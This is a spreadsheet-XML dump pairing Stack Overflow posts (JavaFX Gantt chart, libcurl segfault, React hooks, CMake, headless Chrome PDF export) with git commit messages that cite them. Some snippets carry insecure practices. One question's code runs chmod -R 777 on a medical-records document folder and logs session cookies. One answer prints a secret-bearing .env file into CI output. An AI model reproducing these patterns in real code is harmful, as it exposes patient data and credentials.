    private static double getLength( Object obj) {
        return ((ExtraData) obj).getLength();
    }
    @Override protected void layoutPlotChildren() {
      for (int seriesIndex=0; seriesIndex &amp;lt; getData().size(); seriesIndex++) {
            Series&amp;lt;X,Y&amp;gt; series = getData().get(seriesIndex);
            Iterator&amp;lt;Data&amp;lt;X,Y&amp;gt;&amp;gt; iter = getDisplayedDataIterator(series);
            while(iter.hasNext()) {
                Data&amp;lt;X,Y&amp;gt; item = iter.next();
                double x = getXAxis().getDisplayPosition(item.getXValue());
                double y = getYAxis().getDisplayPosition(item.getYValue());
                if (Double.isNaN(x) || Double.isNaN(y)) {
                    continue;
                }
                Node block = item.getNode();
                Rectangle ellipse;
                if (block != null) {
                    if (block instanceof StackPane) {
                        StackPane region = (StackPane)item.getNode();
                        if (region.getShape() == null) {
                            ellipse = new Rectangle( getLength( item.getExtraValue()), getBlockHeight());
                        } else if (region.getShape() instanceof Rectangle) {
                            ellipse = (Rectangle)region.getShape();
                        } else {
                            return;
                        }
                        ellipse.setWidth( getLength( item.getExtraValue()) * ((getXAxis() instanceof NumberAxis) ? Math.abs(((NumberAxis)getXAxis()).getScale()) : 1));
                        ellipse.setHeight(getBlockHeight() * ((getYAxis() instanceof NumberAxis) ? Math.abs(((NumberAxis)getYAxis()).getScale()) : 1));
                        y -= getBlockHeight() / 2.0;
                        // Note: workaround for RT-7689 - saw this in ProgressControlSkin
                        // The region doesn't update itself when the shape is mutated in place, so we
                        // null out and then restore the shape in order to force invalidation.
                        region.setShape(null);
                        region.setShape(ellipse);
                        region.setScaleShape(false);
                        region.setCenterShape(false);
                        region.setCacheShape(false);
                        block.setLayoutX(x);
                        block.setLayoutY(y);
                    }
                }
            }
        }
    }
    public double getBlockHeight() {
        return blockHeight;
    }
    public void setBlockHeight( double blockHeight) {
        this.blockHeight = blockHeight;
    }
    @Override protected void dataItemAdded(Series&amp;lt;X,Y&amp;gt; series, int itemIndex, Data&amp;lt;X,Y&amp;gt; item) {
        Node block = createContainer(series, getData().indexOf(series), item, itemIndex);
        getPlotChildren().add(block);
    }
    @Override protected  void dataItemRemoved(final Data&amp;lt;X,Y&amp;gt; item, final Series&amp;lt;X,Y&amp;gt; series) {
        final Node block = item.getNode();
            getPlotChildren().remove(block);
            removeDataItemFromDisplay(series, item);
    }
    @Override protected void dataItemChanged(Data&amp;lt;X, Y&amp;gt; item) {
    }
    @Override protected  void seriesAdded(Series&amp;lt;X,Y&amp;gt; series, int seriesIndex) {
        for (int j=0; j&amp;lt;series.getData().size(); j++) {
            Data&amp;lt;X,Y&amp;gt; item = series.getData().get(j);
            Node container = createContainer(series, seriesIndex, item, j);
            getPlotChildren().add(container);
        }
    }
    @Override protected  void seriesRemoved(final Series&amp;lt;X,Y&amp;gt; series) {
        for (XYChart.Data&amp;lt;X,Y&amp;gt; d : series.getData()) {
            final Node container = d.getNode();
            getPlotChildren().remove(container);
        }
        removeSeriesFromDisplay(series);
    }
    private Node createContainer(Series&amp;lt;X, Y&amp;gt; series, int seriesIndex, final Data&amp;lt;X,Y&amp;gt; item, int itemIndex) {
        Node container = item.getNode();
        if (container == null) {
            container = new StackPane();
            item.setNode(container);
        }
        container.getStyleClass().add( getStyleClass( item.getExtraValue()));
        return container;
    }
    @Override protected void updateAxisRange() {
        final Axis&amp;lt;X&amp;gt; xa = getXAxis();
        final Axis&amp;lt;Y&amp;gt; ya = getYAxis();
        List&amp;lt;X&amp;gt; xData = null;
        List&amp;lt;Y&amp;gt; yData = null;
        if(xa.isAutoRanging()) xData = new ArrayList&amp;lt;X&amp;gt;();
        if(ya.isAutoRanging()) yData = new ArrayList&amp;lt;Y&amp;gt;();
        if(xData != null || yData != null) {
            for(Series&amp;lt;X,Y&amp;gt; series : getData()) {
                for(Data&amp;lt;X,Y&amp;gt; data: series.getData()) {
                    if(xData != null) {
                        xData.add(data.getXValue());
                        xData.add(xa.toRealValue(xa.toNumericValue(data.getXValue()) + getLength(data.getExtraValue())));
                    }
                    if(yData != null){
                        yData.add(data.getYValue());
                    }
                }
            }
            if(xData != null) xa.invalidateRange(xData);
            if(yData != null) ya.invalidateRange(yData);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GanttChartSample.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.util.Arrays;
import javafx.application.Application;
import javafx.collections.FXCollections;
import javafx.scene.Scene;
import javafx.scene.chart.CategoryAxis;
import javafx.scene.chart.NumberAxis;
import javafx.scene.chart.XYChart;
import javafx.scene.paint.Color;
import javafx.stage.Stage;
import chart.gantt_04.GanttChart.ExtraData;
// TODO: use date for x-axis
public class GanttChartSample extends Application {
    @Override public void start(Stage stage) {
        stage.setTitle("Gantt Chart Sample");
        String[] machines = new String[] { "Machine 1", "Machine 2", "Machine 3" };
        final NumberAxis xAxis = new NumberAxis();
        final CategoryAxis yAxis = new CategoryAxis();
        final GanttChart&amp;lt;Number,String&amp;gt; chart = new GanttChart&amp;lt;Number,String&amp;gt;(xAxis,yAxis);
        xAxis.setLabel("");
        xAxis.setTickLabelFill(Color.CHOCOLATE);
        xAxis.setMinorTickCount(4);
        yAxis.setLabel("");
        yAxis.setTickLabelFill(Color.CHOCOLATE);
        yAxis.setTickLabelGap(10);
        yAxis.setCategories(FXCollections.&amp;lt;String&amp;gt;observableArrayList(Arrays.asList(machines)));
        chart.setTitle("Machine Monitoring");
        chart.setLegendVisible(false);
        chart.setBlockHeight( 50);
        String machine;
        machine = machines[0];
        XYChart.Series series1 = new XYChart.Series();
        series1.getData().add(new XYChart.Data(0, machine, new ExtraData( 1, "status-red")));
        series1.getData().add(new XYChart.Data(1, machine, new ExtraData( 1, "status-green")));
        series1.getData().add(new XYChart.Data(2, machine, new ExtraData( 1, "status-red")));
        series1.getData().add(new XYChart.Data(3, machine, new ExtraData( 1, "status-green")));
        machine = machines[1];
        XYChart.Series series2 = new XYChart.Series();
        series2.getData().add(new XYChart.Data(0, machine, new ExtraData( 1, "status-green")));
        series2.getData().add(new XYChart.Data(1, machine, new ExtraData( 1, "status-green")));
        series2.getData().add(new XYChart.Data(2, machine, new ExtraData( 2, "status-red")));
        machine = machines[2];
        XYChart.Series series3 = new XYChart.Series();
        series3.getData().add(new XYChart.Data(0, machine, new ExtraData( 1, "status-blue")));
        series3.getData().add(new XYChart.Data(1, machine, new ExtraData( 2, "status-red")));
        series3.getData().add(new XYChart.Data(3, machine, new ExtraData( 1, "status-green")));
        chart.getData().addAll(series1, series2, series3);           
        chart.getStylesheets().add(getClass().getResource("ganttchart.css").toExternalForm());
        Scene scene  = new Scene(chart,620,350);
        stage.setScene(scene);
        stage.show();
    }
    public static void main(String[] args) {
        launch(args);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ganttchart.css&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.status-red {
    -fx-background-color:rgba(128,0,0,0.7);
}
.status-green {
    -fx-background-color:rgba(0,128,0,0.7);
}
.status-blue {
    -fx-background-color:rgba(0,0,128,0.7);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">In our project, we have a lot of ActiveX controls written in VB6. On big (x86) computers it works very well. These controls are hosted on website. And mobile users also wants to use it.
So is there any possible solution to recompile/cross-compile an .ocx and make .cab file to works under ARM architecture?
Or maybe I can emulate x86 architecture on mobile phones/PDAs?  
Mateusz
</t>
  </si>
  <si>
    <t>C945</t>
  </si>
  <si>
    <t>feat(2024): complete day 1 in kotlin (#1)
The solution is not very efficient but works. As a minor optimization,
I've used sequences as much as possible while iterating.
Some general areas for improvement:
* Avoiding regex when splitting each line into integers
* Making `transpose` re-use previous lists
* Memory usage could be optimized a little better by knowing there'll
only ever be two elements in each list entry. That would make e.g. the
`transpose` function less generic though.
Potential improvements for part 1:
* Given a known input length, you could pre-allocate the exact size
array needed for the two lists.
* In this case, it would be interesting to see if there could be a
performance gain by using a binary search algorithm to find the
insertion point. SO does seem to indicate sorting afterwards should be
cheaper, however: https://stackoverflow.com/a/168982/1137077
https://stackoverflow.com/a/47944527/1137077
* It should be possible to create a transposed "view" of the data rather
than physically moving elements in memory and allocating new lists.
* Perhaps `transpose` should stop once the shortest list is depleted
rather than ensuring all lists are of equal length.
Potential improvements for part 2:
* Not sorting the lists (I simply reused my code from part 1 here)
* Actually, you could probably operate entirely on the un-transposed
list for part 2, resulting in a lot fewer total operations.
* converting the second list into a `Map&lt;Int, Int&gt;` (which could be done
in `O(n)`) and using it for lookups while walking the first list
(resulting in a total `O(n)` complexity for this full operation) rather
than locating and summing item</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you add enough items that you're effectively building the list from scratch, you should be able to get better performance by sorting the list afterwards.&lt;/p&gt;
&lt;p&gt;If items are mostly in order, you can tweak both incremental update and regular sorting to take advantage of that, but frankly, it usually isn't worth the trouble.  (You also need to be careful of things like making sure some unexpected ordering can't make your algorithm take much &lt;em&gt;longer&lt;/em&gt;, q.v. naive quicksort)&lt;/p&gt;
&lt;p&gt;Both incremental update and regular list sort are O(N log N) but you can get a better constant factor sorting everything afterward (I'm assuming here that you've got some auxiliary datastructure so your incremental update can access list items faster than O(N)...).  Generally speaking, sorting all at once has a lot more design freedom than maintaining the ordering incrementally, since incremental update has to maintain a complete order at all times, but an all-at-once bulk sort does not.&lt;/p&gt;
&lt;p&gt;If nothing else, remember that there are lots of highly-optimized bulk sorts available.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am trying to convert html to pdf with chrome headless but i am running into some authentication issue&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new ProcessBuilder(&amp;quot;chmod&amp;quot;, &amp;quot;-R&amp;quot;, &amp;quot;777&amp;quot;, &amp;quot;/usr/share/oscar-emr/OscarDocument/oscar/document/&amp;quot;).start().waitFor();
String sessionId = getSessionCookie(request);
if (sessionId == null || sessionId.isEmpty()) {
    System.out.println(&amp;quot;Error: Session ID is missing!&amp;quot;);
    logger.error(&amp;quot;Error: Session ID is missing!&amp;quot;);
    return mapping.findForward(&amp;quot;error&amp;quot;);
}
// Debugging: Print the session cookie
System.out.println(&amp;quot;Using session cookie: JSESSIONID=&amp;quot; + sessionId);
// Use Chrome Headless to directly convert the live page to PDF
ProcessBuilder pb = new ProcessBuilder(
    &amp;quot;/usr/bin/google-chrome&amp;quot;,
    &amp;quot;--headless&amp;quot;,
    &amp;quot;--disable-gpu&amp;quot;,
    &amp;quot;--no-sandbox&amp;quot;,
    &amp;quot;--disable-software-rasterizer&amp;quot;,
    &amp;quot;--disable-crash-reporter&amp;quot;,
    &amp;quot;--disable-dev-shm-usage&amp;quot;,
    &amp;quot;--disable-extensions&amp;quot;,
    &amp;quot;--disable-features=TFLiteLanguageDetection&amp;quot;,
    &amp;quot;--user-data-dir=/tmp/chrome-profile&amp;quot;,
    &amp;quot;--disk-cache-dir=/tmp/chrome-profile/cache&amp;quot;,
    &amp;quot;--virtual-time-budget=10000&amp;quot;, // Ensure JavaScript runs fully
    &amp;quot;--window-size=1280x2000&amp;quot;,
    &amp;quot;--force-device-scale-factor=1&amp;quot;,
    &amp;quot;--disable-features=PaintHolding&amp;quot;,
    &amp;quot;--run-all-compositor-stages-before-draw&amp;quot;,
    &amp;quot;--print-to-pdf=&amp;quot; + tempPdfFilePath,
    &amp;quot;--header=\&amp;quot;Cookie: JSESSIONID=&amp;quot; + sessionId + &amp;quot;\&amp;quot;&amp;quot;, 
    &amp;quot;--header=\&amp;quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36\&amp;quot;&amp;quot;, 
    eformHtmlUrl 
);
pb.environment().put(&amp;quot;HOME&amp;quot;, &amp;quot;/tmp/chrome-profile&amp;quot;);
pb.redirectErrorStream(true);
Process process = pb.start();
// Capture Chrome output logs for debugging
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
    System.out.println(&amp;quot;Chrome Output: &amp;quot; + line);
}
int exitCode = process.waitFor();
System.out.println(&amp;quot;Chrome Exit Code: &amp;quot; + exitCode);
// Verify if the TEMPORARY PDF was created successfully
File tempPdfFile = new File(tempPdfFilePath);
if (!tempPdfFile.exists() || tempPdfFile.length() == 0) {
    System.out.println(&amp;quot;PDF generation failed using Chrome Headless!&amp;quot;);
    logger.error(&amp;quot;PDF generation failed using Chrome Headless!&amp;quot;);
    return mapping.findForward(&amp;quot;error&amp;quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when the a form is submitted the html is passed to a action class where i have this conversion code&lt;br /&gt;
now i am oading the page in the backend and converting it into pdf but the pdf being converted has the login page&lt;br /&gt;
hence as i said i am running into authentication issue&lt;/p&gt;
&lt;p&gt;what should i do&lt;/p&gt;
&lt;p&gt;the project has a jsessionid based authentication&lt;br /&gt;
how do i pass it&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i tried passing the session id through -- headers but did not work
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C946</t>
  </si>
  <si>
    <t>Invoke tests from pipeline, deploy with .env files
This moves the previous ci.yml file to run-tests.yaml, and updates it
for reuse by pipeline.yaml.
I've created a dev DynamoDB table with bin/create-subscribers-table.sh,
and added TEST_ENV_FILE and PROD_ENV_FILE as repository variables per
https://stackoverflow.com/a/63350136. These are used to create the
environment file for the deployment and integration-test steps.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A quick solution here could be having a step to manually create the &lt;code&gt;.env&lt;/code&gt; file before you need it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;      - name: 'Create env file'
        run: |
          touch .env
          echo API_ENDPOINT=&amp;quot;https://xxx.execute-api.us-west-2.amazonaws.com&amp;quot; &amp;gt;&amp;gt; .env
          echo API_KEY=${{ secrets.API_KEY }} &amp;gt;&amp;gt; .env
          cat .env
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a best-practise approach on how to do UI validation in a model-view-presenter architecture. 
I need to validate some forms with a lot of controls. And to make it easy for the user, I store all errors or warnings with a reference to the control in a Log which is displayed to the user afterwards so that he can jump right away to the control he has to fix. This is done in the view-part, which is actually wrong since validation should take place in the presenter in order to exchange the view.
The problem for me of doing this validation in the presenter is that it is not just checking if provided values are wrong, it also needs to check if radiobuttons have been checked which enables a textbox, which then has to contain some text for example.
I was thinking of using the BindingSource in the presenter since it's reflecting the UI changes and is visible to the presenter. But I am not sure if this is the right way to go (and I think it's kind of ugly)?
By the way: the validation takes not just place before I write to the database; it already takes place while the user is working on the forms.
Could anyone think of a good way of doing this?
</t>
  </si>
  <si>
    <t>C947</t>
  </si>
  <si>
    <t>Donor Tab Working
* Added Find Functionality
* Added Add Donor button functionality
* Add Donor Dialog
* Add Donor Dialog Button reusable across different tabs.
  Important Post: http://stackoverflow.com/questions/12340432/jquery-ui-dialog-does-not-disappear
  There is one bug though http://stackoverflow.com/questions/12342427/prevent-tab-caching-jquery-ui</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You need not render the following part from your jsp's response&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class="addFormDialog" title="Add New"&amp;gt;&amp;lt;/div&amp;gt;
$("#addButton").button().click(function() {
        $("#addFormDialog").html(formData);
        $("#addFormDialog").dialog("open");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;Just have the following, ideally with class names and not duplicate id's&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;button class="addButton"&amp;gt;Click here to Add New&amp;lt;/button&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;I still don't think you need unique id's - &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="tabs-container"&amp;gt;
    &amp;lt;!-- tabs here -- &amp;gt;
    &amp;lt;-- let's say this is tab#1 --&amp;gt;
       &amp;lt;button class="addButton"&amp;gt;Click here to Add New&amp;lt;/button&amp;gt;
       &amp;lt;div class="addFormDialog" title="Add New"&amp;gt;&amp;lt;/div&amp;gt;
    &amp;lt;!-- tab1 --&amp;gt;
&amp;lt;/div&amp;gt;
$('#tabs-container').on('click' , '.addButton', function(){
    var dialogContent = $(this).siblings('.addFormDialog');
    //now call .dialog({..});  or whatever you need
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This way you're binding just one click handler that listens to any &lt;code&gt;click&lt;/code&gt; that bubbles up from a &lt;code&gt;.addButton&lt;/code&gt; and then searches for its sibling &lt;code&gt;.addFormDialog&lt;/code&gt;. (I hope I'm not sounding too confusing)&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code that generates a segmentation fault:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;curl/curl.h&amp;gt;
#define API_BASE_PATH &amp;quot;127.0.0.1/api/v2/&amp;quot;
#define API_INFO &amp;quot;lcd/info&amp;quot;
typedef enum {
    Get,                        //!&amp;lt; GET method
    Post,                       //!&amp;lt; POST method
    Patch                       //!&amp;lt; PATCH method
} Api_Method;
struct MemoryStruct {
    char *memory;
    size_t size;
};
size_t WriteData(void *contents, size_t size, size_t nmemb, void *userp) {
    size_t realsize = size * nmemb;
    struct MemoryStruct *mem = (struct MemoryStruct *)userp;
    mem-&amp;gt;memory = (char*)realloc(mem-&amp;gt;memory, mem-&amp;gt;size + realsize + 1);
    memset(mem-&amp;gt;memory, 0, mem-&amp;gt;size + realsize + 1);
    if(mem-&amp;gt;memory == NULL) {
        /* out of memory! */
        printf(&amp;quot;not enough memory (realloc returned NULL)\n&amp;quot;);
        return 0;
    }
    memcpy(&amp;amp;(mem-&amp;gt;memory[mem-&amp;gt;size]), contents, realsize);
    mem-&amp;gt;size += realsize;
    mem-&amp;gt;memory[mem-&amp;gt;size] = 0;
    return realsize;
}
int callApi(const char* api, char* authorization_token, char* params,
            char* body, char** response, Api_Method method)
{
    CURL* curl;
    CURLcode res;
    MemoryStruct chunk;
    // Initialize objects
    memset(&amp;amp;chunk,0,sizeof(MemoryStruct));
    curl_global_init(CURL_GLOBAL_ALL);
    curl = curl_easy_init();
    // Call the API prepending the base path
    int api_length = strlen(API_BASE_PATH) + strlen(api) + (params != NULL ? strlen(params) : 0) + 1;
    char* api_string = (char*)malloc(api_length);
    memset(api_string, 0, api_length);
    snprintf(api_string, api_length, &amp;quot;%s%s%s&amp;quot;, API_BASE_PATH, api, params != NULL ? params : &amp;quot;&amp;quot;);
    chunk.memory = (char*)malloc(1);
    chunk.size = 0;
    curl_easy_setopt(curl, CURLOPT_URL, api_string);
    switch (method) {
        case Post:
            curl_easy_setopt(curl, CURLOPT_POST, true);
            break;
        case Patch:
            curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, &amp;quot;PATCH&amp;quot;);
            break;
        default:
            break;
    }
    // Set the writing callback function
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, WriteData);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, (void *)&amp;amp;chunk);
    if ((res = curl_easy_perform(curl)) != CURLE_OK ) {
        printf(&amp;quot;curl failed: %s\n&amp;quot;, curl_easy_strerror(res));
    } else {
        res = CURLE_OK;
        curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &amp;amp;res);
        curl_easy_cleanup(curl);
        if (response != NULL) {
            *response = strdup(chunk.memory);
        }
    }
    curl_global_cleanup();
    if (chunk.memory != NULL) {
        free(chunk.memory);
    }
    if (api_string != NULL) {
        free(api_string);
    }
    return 0;
}
int main(int argc, char **argv) {
  char* response = NULL;
  // Call the API
  callApi(API_INFO, NULL, NULL, NULL, &amp;amp;response, Get);
  printf(&amp;quot;%s\n&amp;quot;, response);
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using gdb, I found that the segmentation fault is generated at line 44&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*response = strdup(chunk.memory);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;because the chunk object is unknown (I see this in the local variables section of the VS Code debugger). Just before line 40&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &amp;amp;res);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the chunk object is valid and its field memory is the json string I expect as response:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{memory = 0x557bcc43a750 &amp;quot;{\&amp;quot;cpf\&amp;quot;:\&amp;quot;MYCPF\&amp;quot;,\&amp;quot;software_version_tag\&amp;quot;:\&amp;quot;1.1.0\&amp;quot;,\&amp;quot;di1\&amp;quot;:{\&amp;quot;id\&amp;quot;:\&amp;quot;DI_1\&amp;quot;,\&amp;quot;type\&amp;quot;:\&amp;quot;input\&amp;quot;,\&amp;quot;status\&amp;quot;:0,\&amp;quot;label\&amp;quot;:\&amp;quot;D.I. 1\&amp;quot;},\&amp;quot;autologin_enabled\&amp;quot;:true,\&amp;quot;data\&amp;quot;:{\&amp;quot;min\&amp;quot;:0,\&amp;quot;usage\&amp;quot;:0,\&amp;quot;eta\&amp;quot;:0,\&amp;quot;max\&amp;quot;:0},\&amp;quot;acti&amp;quot;..., size = 1920}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but right after line 40 the object is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{memory = 0x557b00000000 &amp;lt;error: Cannot access memory at address 0x557b00000000&amp;gt;, size = 1920}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is a local variable and I can't understand where it is overwritten...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C948</t>
  </si>
  <si>
    <t>Big Implementation!
Slowly but steadily getting the hang of React! Won't you look at that :) :P
Listening to Fall of the Idiosyncratic Juggernaught.
This isn't quite working yet, but it sure as heck is getting closer to my original implementation, so that's good!
https://stackoverflow.com/questions/46138145/where-should-functions-in-function-components-go
https://react.dev/reference/react/useCallback
https://daveceddia.com/react-hook-after-render/
https://stackoverflow.com/questions/53332321/react-hook-warnings-for-async-function-in-useeffect-useeffect-function-must-ret</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The first thing to note is that stateless functional components cannot have methods: You shouldn't count on calling &lt;code&gt;update&lt;/code&gt; or &lt;code&gt;draw&lt;/code&gt; on a rendered &lt;code&gt;Ball&lt;/code&gt; if it is a stateless functional component.&lt;/p&gt;
&lt;p&gt;In most cases you should declare the functions outside the component function so you declare them only once and always reuse the same reference. When you declare the function inside, every time the component is rendered the function will be defined again.&lt;/p&gt;
&lt;p&gt;There are cases in which you will need to define a function inside the component to, for example, assign it as an event handler that behaves differently based on the properties of the component. But still you could define the function outside &lt;code&gt;Ball&lt;/code&gt; and bind it with the properties, making the code much cleaner and making the &lt;code&gt;update&lt;/code&gt; or &lt;code&gt;draw&lt;/code&gt; functions reusable:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;// you can use update somewhere else
const update = (propX, a, b) =&amp;gt; { ... };
const Ball = props =&amp;gt; (
  &amp;lt;Something onClick={update.bind(null, props.x)} /&amp;gt;
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you're using &lt;strong&gt;hooks&lt;/strong&gt;, you can use &lt;code&gt;useCallback&lt;/code&gt; to ensure the function is only redefined when any of its dependencies change (&lt;code&gt;props.x&lt;/code&gt; in this case):&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const Ball = props =&amp;gt; {
  const onClick = useCallback((a, b) =&amp;gt; {
    // do something with a, b and props.x
  }, [props.x]);
  return (
    &amp;lt;Something onClick={onClick} /&amp;gt;
  );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is &lt;strong&gt;the wrong way&lt;/strong&gt;:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const Ball = props =&amp;gt; {
  function update(a, b) {
    // props.x is visible here
  }
  return (
    &amp;lt;Something onClick={update} /&amp;gt;
  );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When using &lt;code&gt;useCallback&lt;/code&gt;, defining the &lt;code&gt;update&lt;/code&gt; function in the &lt;code&gt;useCallback&lt;/code&gt; hook itself or outside the component becomes a design decision more than anything: You should take into account if you're going to reuse &lt;code&gt;update&lt;/code&gt; and/or if you need to access the scope of the component's closure to, for example, read/write to the state. Personally I choose to define it inside the component by default and make it reusable only if the need arises, to prevent over-engineering from the start. On top of that, reusing application logic is better done with more specific hooks, leaving components for presentational purposes. Defining the function outside the component while using hooks really depends on the grade of decoupling from React you want for your application logic.&lt;/p&gt;
&lt;p&gt;Another &lt;a href="https://stackoverflow.com/questions/57289811/function-inside-functional-component-in-react-hooks-performance"&gt;common discussion&lt;/a&gt; about &lt;code&gt;useCallback&lt;/code&gt; is whether to always use it for every function or not. That is, treat is as &lt;em&gt;opt-in&lt;/em&gt; or &lt;em&gt;always recommendable&lt;/em&gt;. I would argue to always use &lt;code&gt;useCallback&lt;/code&gt;: I've seen many bugs caused by not wrapping a function in &lt;code&gt;useCallback&lt;/code&gt; and not a single scenario where doing so affects the performance or logic in any way. In most cases, you want to keep a reference while the dependencies don't change, so you can use the function itself as a dependency for other effects, memos or callback. In many cases the callback will be passed as a prop to other elements, and if you memoized it with &lt;code&gt;useCallback&lt;/code&gt; you won't change the props (thus re-render) other components independently of how cheap or costly that would be. I've seen many thousands of functions declared in components and not a single case in which using &lt;code&gt;useCallback&lt;/code&gt; would have any down side. On the other hand most functions not memoized with &lt;code&gt;useCallback&lt;/code&gt; would eventually be changed to do so, causing serious bugs or performance issues if the developer doesn't recognize the implications of not doing so. &lt;em&gt;Technically&lt;/em&gt; there is a performance hit by using &lt;code&gt;useCallback&lt;/code&gt;, as you would be creating and additional function but it is negligible compared to the re-declaration of the function that always has to happen either you use &lt;code&gt;useCallback&lt;/code&gt; or not and the overall footprint of React and JavaScript. So, if you are really concerned about the performance impact of &lt;code&gt;useCallback&lt;/code&gt; versus not using it, you should be questioning yourself if React is the right tool for the job.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I see two main "schools of thoughts" when it comes to creating larger-scale enterprise-wide apps on .NET (Winforms, WPF, ASP.NET).
Some folks use the "repository pattern" which uses a repository that knows how to fetch, insert, update and delete objects. Those objects are rather "dumb" in that they don't necessarily contain a whole lot of logic - e.g. they're more or less data-transfer objects.
The other camp uses what I call "smart" business objects that know how to load themselves, and they typically have a Save(), possibly Update() or even Delete() method. Here you really don't need any repository - the objects themselves know how to load and save themselves.
Big question is: which do you use or prefer? And why? 
Do you use the same approach in all your apps, or do you have any particular criteria when to choose one approach over the other? If so - what are those criteria?
I'm not trying to start a flame-war here - just trying to find out what everyone thinks about this and what your opinion is, and why you use one (or both) patterns over the other.
Thanks for any constructive input!
</t>
  </si>
  <si>
    <t>C949</t>
  </si>
  <si>
    <t>Renamed TimePlot to LinePlot
+ deleted SpectrumPlot (redundant)
Added height prop to LinePlot component
+ https://stackoverflow.com/a/44103916/3382269
+ https://stackoverflow.com/a/48523682/3382269</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;From &lt;a href="https://facebook.github.io/react/docs/dom-elements.html#style" rel="noreferrer"&gt;DOC&lt;/a&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;In React, inline styles are not specified as a string. Instead they
  are specified with an object whose key is the camelCased version of
  the style name, and whose value is the style's value, usually a
  string.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So instead of &lt;code&gt;background-image&lt;/code&gt; use &lt;code&gt;backgroundImage&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;For example:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;padding-top      ---&amp;gt;     paddingTop
padding-left     ---&amp;gt;     paddingLeft
margin-right     ---&amp;gt;     marginRight
...
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
  &lt;p&gt;How to specify the inline style?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We need to pass a object to style attribute which will contains all the values in form of key-value pair.&lt;/p&gt;
&lt;p&gt;Like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div 
    style={{
       backgroundImage: 'url(../images/WinterCalling_2016.jpg)', 
       marginTop: 20}}
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We can use &lt;a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Template_literals" rel="noreferrer"&gt;template literals&lt;/a&gt; to pass a variable inside url, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style={{backgroundImage: `url(${image1})`}}&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to replace all the non-target commands with correct target commands of my project. The version of cmake is 3.20.5.&lt;/p&gt;
&lt;p&gt;Two main tasks is done during this process.For first one, I create an INTERFACE target to manage global options, like compile options. For the other one, I add some OBJECT lib trying to minimize the time cost of compile.&lt;/p&gt;
&lt;p&gt;Here is a samll version of my project.&lt;/p&gt;
